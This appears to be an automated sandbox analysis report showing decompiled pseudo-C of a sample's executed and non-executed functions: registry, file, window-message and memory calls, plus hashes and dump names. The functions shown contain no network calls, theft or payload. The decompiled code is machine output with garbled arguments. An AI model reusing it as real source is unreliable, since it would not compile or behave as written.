Download Yara Rule

C-Code - Quality: 79%

			E00402BD8(void* __eflags, void* _a4) {
				char* _t8;
				intOrPtr _t9;
				signed int _t11;

				_t8 = E00402ACE(0x22);
				_t9 =  *0x40a7e8; // 0x3c2fd54
				_t3 = _t9 + 4; // 0xa1
				_t11 = RegOpenKeyExA(E00402BC3( *_t3), _t8, 0,  *0x4237b0 | _a4,  &_a4); // executed
				asm("sbb eax, eax");
				return  !( ~_t11) & _a4;
			}

0x00402bec
0x00402bf2
0x00402bf7
0x00402c00
0x00402c08
0x00402c10

APIs

RegOpenKeyExA.KERNELBASE(00000000,000000A1,00000000,00000022,00000000,?,?), ref: 00402C00

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 11541d565f05363a0d465782138c1ad9d83dbb2602eb40d854f4a90bf0086a6c
Instruction ID: 6fd07f2ce2adc625a6652da0132449d5779af3e63dc15cb94c9fb33f64fceb3c
Opcode Fuzzy Hash: 11541d565f05363a0d465782138c1ad9d83dbb2602eb40d854f4a90bf0086a6c
Instruction Fuzzy Hash: 6DE046B6250108BADB00EFA4EE4AF9577ECEB48700F008021B608E70A1C678E6508B69

Uniqueness

Uniqueness Score: -1.00%

Function 00405AA7 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405AA7(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405aab
0x00405abb
0x00405ac3
0x00000000
0x00405aca
0x00000000
0x00405acc

APIs

WriteFile.KERNELBASE(00000000,00000000,?,?,00000000,00000020,?,004030F0,00000000,0040A8C0,00000020,0040A8C0,00000020,000000FF,?,00000000), ref: 00405ABB

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
Instruction ID: f4a187dd2f22618735bf3d673191986ec615513a7c1a6e68f4ad383cdd1c0543
Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
Instruction Fuzzy Hash: 7CE08632210259AFDF109E518C40EEB3B6CEB04350F044432F911E2140D230ED10DFB4

Uniqueness

Uniqueness Score: -1.00%

Function 1000270B Relevance: 1.5, APIs: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x10004038 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x1000404c, "true", "true", 0x1000403c); // executed
					 *0x1000404c = 0xc2;
					 *0x1000403c = 0;
					 *0x10004044 = 0;
					 *0x10004058 = 0;
					 *0x10004048 = 0;
					 *0x10004040 = 0;
					 *0x10004050 = 0;
					 *0x1000404e = 0;
				}
				return 1;
			}

0x10002714
0x10002719
0x10002729
0x10002731
0x10002738
0x1000273d
0x10002742
0x10002747
0x1000274c
0x10002751
0x10002756
0x10002756
0x1000275e

APIs

VirtualProtect.KERNELBASE(1000404C,?,?,1000403C), ref: 10002729

Memory Dump Source

Source File: 00000000.00000002.1046900983.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1046873048.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1046935240.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1046965779.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_wLlREXsA9M.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
Instruction ID: 4f82052a8ee677216feeb46ba648c84afb962adc58c95b92ee0d34447feb5494
Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
Instruction Fuzzy Hash: B5F09BF19092A0DEF360DF688CC4B063FE4E3983D5B03892AE358F6269EB7441448B19

Uniqueness

Uniqueness Score: -1.00%

Function 00403FBE Relevance: 1.5, APIs: 1, Instructions: 9
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403FBE(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x422ed8; // 0x1042e
				if(_t2 != 0) {
					_t3 = SendMessageA(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}

0x00403fbe
0x00403fc5
0x00403fd0
0x00000000
0x00403fd0
0x00403fd6

APIs

SendMessageA.USER32(0001042E,00000000,00000000,00000000), ref: 00403FD0

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
Instruction ID: 0ff3f0e525f60516a86a519725d983b0454bf57a5056f365e4862df1f99b7c2a
Opcode Fuzzy Hash: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
Instruction Fuzzy Hash: ECC04C71B482017AEA318F509D49F0677696750B41F558425B210E50D0D6B4E451D62D

Uniqueness

Uniqueness Score: -1.00%

Function 00403125 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403125(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409018, _a4, 0, 0); // executed
				return _t2;
			}

0x00403133
0x00403139

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EC1,?), ref: 00403133

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D

Uniqueness

Uniqueness Score: -1.00%

Function 00403FA7 Relevance: 1.5, APIs: 1, Instructions: 6
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403FA7(int _a4) {
				long _t2;

				_t2 = SendMessageA( *0x423708, "true", _a4, 1); // executed
				return _t2;
			}

0x00403fb5
0x00403fbb

APIs

SendMessageA.USER32(?,?,00000001,00403DD8), ref: 00403FB5

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
Instruction ID: 7b5ccc39adf6f72de5191684d4495c6b43ffe58f78915606d69c4a7e6f44d702
Opcode Fuzzy Hash: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
Instruction Fuzzy Hash: F3B092B5684200BAEE224B40DD09F457EA2E7A4702F008024B300240B0C6B200A1DB19

Uniqueness

Uniqueness Score: -1.00%

Function 00403F94 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403F94(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x41fd04, _a4); // executed
				return _t2;
			}

0x00403f9e
0x00403fa4

APIs

KiUserCallbackDispatcher.NTDLL(?,00403D71), ref: 00403F9E

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 12c11760972377b051275edfb0549e2da63da5a0a3d5c66f9a0e944dd115ee42
Instruction ID: 627edf876ec6fe827e8ded8b6e0f84c3e1bff33d3b07c91bc4a796ca35ff40dd
Opcode Fuzzy Hash: 12c11760972377b051275edfb0549e2da63da5a0a3d5c66f9a0e944dd115ee42
Instruction Fuzzy Hash: CAA00176808101ABCB029B50FF09D9ABF62ABA5705B028435E65694174C7325865FF1A

Uniqueness

Uniqueness Score: -1.00%

Function 004014D6 Relevance: 1.3, APIs: 1, Instructions: 19
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004014D6(intOrPtr __edx) {
				long _t3;
				void* _t7;
				intOrPtr _t10;
				void* _t13;

				_t10 = __edx;
				_t3 = E00402AAC(_t7);
				 *((intOrPtr*)(_t13 - 0x38)) = _t10;
				if(_t3 <= 1) {
					_t3 = 1;
				}
				Sleep(_t3); // executed
				 *0x423788 =  *0x423788 +  *((intOrPtr*)(_t13 - 4));
				return 0;
			}

0x004014d6
0x004014d7
0x004014e0
0x004014e3
0x004014e7
0x004014e7
0x004014e9
0x00402961
0x0040296d

APIs

Sleep.KERNELBASE(00000000), ref: 004014E9

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 1dbdbb49b5631c56cf2b8aecf5802b19cfbd8c4f3255373f9c0d49c6f2f4634a
Instruction ID: 83fc3ffccd985723ae0c7d7348023f3eda8d738e62e7b45dbb078e8b847b840f
Opcode Fuzzy Hash: 1dbdbb49b5631c56cf2b8aecf5802b19cfbd8c4f3255373f9c0d49c6f2f4634a
Instruction Fuzzy Hash: 93D05EB3B14141ABDB20EBB8BAC445E77E4EB403257304837E502E2091E6798A429618

Uniqueness

Uniqueness Score: -1.00%

Function 10001215 Relevance: 1.3, APIs: 1, Instructions: 4
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001215() {
				void* _t1;

				_t1 = GlobalAlloc("true",  *0x1000405c); // executed
				return _t1;
			}

0x1000121d
0x10001223

APIs

GlobalAlloc.KERNELBASE(?,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D

Memory Dump Source

Source File: 00000000.00000002.1046900983.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1046873048.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1046935240.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1046965779.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_wLlREXsA9M.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
Instruction ID: 35b308b173d9b0532f6cde55f5bface33093279d7ce3c78a2cc6db588f634b90
Opcode Fuzzy Hash: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
Instruction Fuzzy Hash: 6CA002B1945620DBFE429BE08D9EF1B3B25E748781F01C040E315641BCCA754010DF39

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404923 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481
windowmemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E00404923(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed char* _v28;
				long _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				signed char* _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t192;
				int _t194;
				intOrPtr _t195;
				intOrPtr _t197;
				long _t201;
				signed int _t205;
				signed int _t216;
				void* _t219;
				void* _t220;
				int _t226;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t239;
				signed int _t241;
				signed char _t242;
				signed char _t248;
				void* _t252;
				void* _t254;
				signed char* _t270;
				signed char _t271;
				long _t273;
				long _t276;
				int _t277;
				int _t282;
				signed int _t283;
				long _t284;
				signed int _t287;
				signed int _t294;
				int _t295;
				int _t296;
				signed char* _t302;
				struct HWND__* _t306;
				int _t307;
				signed int* _t308;
				int _t309;
				long _t310;
				signed int _t311;
				void* _t313;
				long _t314;
				int _t315;
				signed int _t316;
				void* _t318;

				_t306 = _a4;
				_v12 = GetDlgItem(_t306, 0x3f9);
				_v8 = GetDlgItem(_t306, 0x408);
				_t318 = SendMessageA;
				_v20 =  *0x423728;
				_t282 = 0;
				_v24 =  *0x423710 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t285 = _a16;
					} else {
						_a12 = _t282;
						_t285 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t285;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t285 + 4)) == 0x408) {
							if(( *0x423719 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t282) {
									_t231 = _v16;
									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t282,  *(_t231 + 0x5c));
									}
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6a) {
										_t285 = _v20;
										_t233 =  *(_t232 + 0x5c);
										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
											 *(_t233 * 0x418 + _t285 + 8) =  *(_t233 * 0x418 + _t285 + 8) & 0xffffffdf;
										} else {
											 *(_t233 * 0x418 + _t285 + 8) =  *(_t233 * 0x418 + _t285 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t285 = 0 | _a8 != 0x00000413;
								_t239 = E00404871(_v8, _a8 != 0x413);
								_t311 = _t239;
								if(_t311 >= _t282) {
									_t285 = _t239 * 0x418 + _v20 + 8;
									_t241 =  *_t285;
									if((_t241 & 0x00000010) == 0) {
										if((_t241 & 0x00000040) == 0) {
											_t242 = _t241 ^ 0x00000001;
										} else {
											_t248 = _t241 ^ 0x00000080;
											if(_t248 >= 0) {
												_t242 = _t248 & 0x000000fe;
											} else {
												_t242 = _t248 | 0x00000001;
											}
										}
										 *_t285 = _t242;
										E0040117D(_t311);
										_a12 = _t311 + 1;
										_a16 =  !( *0x423718) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t285 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t282, _t282);
							}
							if(_a8 == 0x40b) {
								_t219 =  *0x41fcec; // 0x0
								if(_t219 != _t282) {
									ImageList_Destroy(_t219);
								}
								_t220 =  *0x41fd00; // 0x0
								if(_t220 != _t282) {
									GlobalFree(_t220);
								}
								 *0x41fcec = _t282;
								 *0x41fd00 = _t282;
								 *0x423760 = _t282;
							}
							if(_a8 != 0x40f) {
								L88:
								if(_a8 == 0x420 && ( *0x423719 & 0x00000001) != 0) {
									_t307 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t307);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
								}
								goto L91;
							} else {
								E004011EF(_t285, _t282, _t282);
								_t192 = _a12;
								if(_t192 != _t282) {
									if(_t192 != 0xffffffff) {
										_t192 = _t192 - 1;
									}
									_push(_t192);
									_push("true");
									E004048F1();
								}
								if(_a16 == _t282) {
									L75:
									E004011EF(_t285, _t282, _t282);
									_t194 =  *0x41fd00; // 0x0
									_v32 = _t194;
									_t195 =  *0x423728;
									_v60 = 0xf030;
									_v20 = _t282;
									if( *0x42372c <= _t282) {
										L86:
										InvalidateRect(_v8, _t282, 1);
										_t197 =  *0x422edc; // 0x776280
										if( *((intOrPtr*)(_t197 + 0x10)) != _t282) {
											E0040482C(0x3ff, 0xfffffffb, E00404844(5));
										}
										goto L88;
									}
									_t308 = _t195 + 8;
									do {
										_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
										if(_t201 != _t282) {
											_t287 =  *_t308;
											_v68 = _t201;
											_v72 = 8;
											if((_t287 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t308[4]);
												_t308[0] = _t308[0] & 0x000000fe;
											}
											if((_t287 & 0x00000040) == 0) {
												_t205 = (_t287 & 0x00000001) + 1;
												if((_t287 & 0x00000010) != 0) {
													_t205 = _t205 + 3;
												}
											} else {
												_t205 = 3;
											}
											_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t287 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t282,  &_v72);
										}
										_v20 = _v20 + 1;
										_t308 =  &(_t308[0x106]);
									} while (_v20 <  *0x42372c);
									goto L86;
								} else {
									_t309 = E004012E2( *0x41fd00);
									E00401299(_t309);
									_t216 = 0;
									_t285 = 0;
									if(_t309 <= _t282) {
										L74:
										SendMessageA(_v12, 0x14e, _t285, _t282);
										_a16 = _t309;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v24 + _t216 * 4)) != _t282) {
											_t285 = _t285 + 1;
										}
										_t216 = _t216 + 1;
									} while (_t216 < _t309);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L91;
						} else {
							_t226 = SendMessageA(_v12, 0x147, _t282, _t282);
							if(_t226 == 0xffffffff) {
								goto L91;
							}
							_t310 = SendMessageA(_v12, "true", _t226, _t282);
							if(_t310 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t310 * 4)) == _t282) {
								_push("true");
								_pop(_t310);
							}
							E00401299(_t310);
							SendMessageA(_a4, 0x420, _t282, _t310);
							_a12 = _a12 | 0xffffffff;
							_a16 = _t282;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v32 = 0;
					_v16 = 2;
					 *0x423760 = _t306;
					 *0x41fd00 = GlobalAlloc("true",  *0x42372c << 2);
					_t252 = LoadBitmapA( *0x423700, 0x6e);
					 *0x41fcf4 =  *0x41fcf4 | 0xffffffff;
					_t313 = _t252;
					 *0x41fcfc = SetWindowLongA(_v8, "true", E00404F1A);
					_t254 = ImageList_Create("true", "true", 0x21, 6, 0);
					 *0x41fcec = _t254;
					ImageList_AddMasked(_t254, _t313, 0xff00ff);
					SendMessageA(_v8, 0x1109, 2,  *0x41fcec);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, "true", 0);
					}
					DeleteObject(_t313);
					_t314 = 0;
					do {
						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
							if(_t314 != 0x20) {
								_v16 = _t282;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t282, E00405DAF(_t282, _t314, _t318, _t282, _t260)), _t314);
						}
						_t314 = _t314 + 1;
					} while (_t314 < 0x21);
					_t315 = _a16;
					_t283 = _v16;
					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
					_push(0x15);
					E00403F72(_a4);
					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
					_push(0x16);
					E00403F72(_a4);
					_t316 = 0;
					_t284 = 0;
					if( *0x42372c <= 0) {
						L19:
						SetWindowLongA(_v8, "true", GetWindowLongA(_v8, "true") & 0x000000fb);
						goto L20;
					} else {
						_t302 = _v20 + 8;
						_v28 = _t302;
						do {
							_t270 =  &(_t302[0x10]);
							if( *_t270 != 0) {
								_v60 = _t270;
								_t271 =  *_t302;
								_push("true");
								_pop(_t294);
								_v84 = _t284;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t294;
								_v40 = _t316;
								_v68 = _t271 & _t294;
								if((_t271 & 0x00000002) == 0) {
									if((_t271 & 0x00000004) == 0) {
										_t273 = SendMessageA(_v8, 0x1100, 0,  &_v84);
										_t295 =  *0x41fd00; // 0x0
										 *(_t295 + _t316 * 4) = _t273;
									} else {
										_t284 = SendMessageA(_v8, 0x110a, 3, _t284);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t276 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_t296 =  *0x41fd00; // 0x0
									_v32 = 1;
									 *(_t296 + _t316 * 4) = _t276;
									_t277 =  *0x41fd00; // 0x0
									_t284 =  *(_t277 + _t316 * 4);
								}
							}
							_t316 = _t316 + 1;
							_t302 =  &(_v28[0x418]);
							_v28 = _t302;
						} while (_t316 <  *0x42372c);
						if(_v32 != 0) {
							L20:
							if(_v16 != 0) {
								E00403FA7(_v8);
								_t282 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403FA7(_v12);
								L91:
								return E00403FD9(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404932
0x00404943
0x00404948
0x00404950
0x00404956
0x0040495e
0x0040496c
0x0040496f
0x00404b8f
0x00404b96
0x00404baa
0x00404b98
0x00404b9a
0x00404b9d
0x00404b9e
0x00404ba5
0x00404ba5
0x00404bb6
0x00404bc4
0x00404bc7
0x00404bdd
0x00404c52
0x00404c55
0x00404c57
0x00404c61
0x00404c6f
0x00404c6f
0x00404c71
0x00404c7b
0x00404c81
0x00404c84
0x00404c87
0x00404ca2
0x00404c89
0x00404c93
0x00404c93
0x00404c87
0x00404c7b
0x00000000
0x00404c55
0x00404be2
0x00404bed
0x00404bf2
0x00404bf9
0x00404bfe
0x00404c02
0x00404c0d
0x00404c11
0x00404c15
0x00404c19
0x00404c2c
0x00404c1b
0x00404c1b
0x00404c22
0x00404c28
0x00404c24
0x00404c24
0x00404c24
0x00404c22
0x00404c30
0x00404c32
0x00404c45
0x00404c48
0x00404c4b
0x00404c4b
0x00404c15
0x00000000
0x00404c02
0x00404be4
0x00404beb
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00404ca5
0x00404ca5
0x00404cac
0x00404d1d
0x00404d25
0x00404d2d
0x00404d2d
0x00404d36
0x00404d38
0x00404d3f
0x00404d42
0x00404d42
0x00404d48
0x00404d4f
0x00404d52
0x00404d52
0x00404d58
0x00404d5e
0x00404d64
0x00404d64
0x00404d71
0x00404ec7
0x00404ece
0x00404eeb
0x00404ef1
0x00404f03
0x00404f03
0x00000000
0x00404d77
0x00404d79
0x00404d7e
0x00404d83
0x00404d88
0x00404d8a
